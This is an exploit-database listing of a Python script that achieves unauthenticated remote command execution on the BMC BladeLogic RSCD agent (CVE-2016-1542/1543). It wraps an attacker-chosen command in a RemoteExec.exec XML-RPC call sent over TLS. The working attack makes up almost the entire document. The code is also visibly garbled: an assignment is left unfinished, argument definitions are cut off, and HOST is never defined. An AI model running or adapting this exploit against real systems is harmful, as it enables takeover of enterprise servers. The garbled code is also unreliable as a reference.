BMC BladeLogic - Remote Command Execution

EKU-ID: 7307 CVE: 2016-1542 OSVDB-ID:
Author: Paul Taylor Published: 2018-01-29 Verified: Verified



# Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version
# Filename:
# Github:
# Date: 2018-01-24
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website:
# Version: BMC RSCD agent
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# Vendor Advisory:
# Tested on:
# BMC BladeLogic RSCD agent remote exec - XMLRPC version
# CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)
# By Paul Taylor / Foregenix Ltd
# Credit:
# Credit:
# Credit: Nick Bloor for AWS image for testing :-)
import socket
import ssl
import sys
import argparse
import requests
import httplib
from requests.packages.urllib3 import PoolManager
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3.connectionpool import HTTPConnectionPool
from requests.adapters import HTTPAdapter
class MyHTTPConnection(HTTPConnection):
    def __init__(self, unix_socket_url, timeout=60):
        HTTPConnection.__init__(self, HOST, timeout=timeout)
        self.unix_socket_url = unix_socket_url
        self.timeout = timeout
    def connect(self):
        self.sock = wrappedSocket
class MyHTTPConnectionPool(HTTPConnectionPool):
    def __init__(self, socket_path, timeout=60):
        HTTPConnectionPool.__init__(self, HOST, timeout=timeout)
        self.socket_path = socket_path
        self.timeout = timeout
    def _new_conn(self):
        return MyHTTPConnection(self.socket_path, self.timeout)
class MyAdapter(HTTPAdapter):
    def __init__(self, timeout=60):
        super(MyAdapter, self).__init__()
        self.timeout = timeout
    def get_connection(self, socket_path, proxies=None):
        return MyHTTPConnectionPool(socket_path, self.timeout)
    def request_url(self, request, proxies):
        return request.path_url
def optParser():
    parser = argparse.ArgumentParser(
                        description="Remote exec " +
                        "BladeLogic Server Automation RSCD agent"
    parser.add_argument("host", help="IP address of a target system")
            help="TCP port (default: 4750)"
    parser.add_argument("command", help="Command to execute")
    opts = parser.parse_args()
    return opts
def sendXMLRPC(host, port, packet, tlsrequest):
    r =
            'http://' + host + ':' + str(port) + '/xmlrpc', data=packet
    print r.status_code
    print r.content
intro = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteServer.intro</methodName><params><param><value>2016-1-14-18-10-30-3920958</value></param><param><value>7</value></param><param><value>0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;</value></param><param><value></value></param></params></methodCall>"""
options = optParser()
rexec = options.command
PORT = options.port
rexec = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>RemoteExec.exec</methodName><params><param><value>""" + rexec  + """</value></param></params></methodCall>"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, PORT))
wrappedSocket = ssl.wrap_socket(sock)
adapter = MyAdapter()
s = requests.session()
s.mount("http://", adapter)
sendXMLRPC(HOST, PORT, intro, s)
sendXMLRPC(HOST, PORT, rexec, s)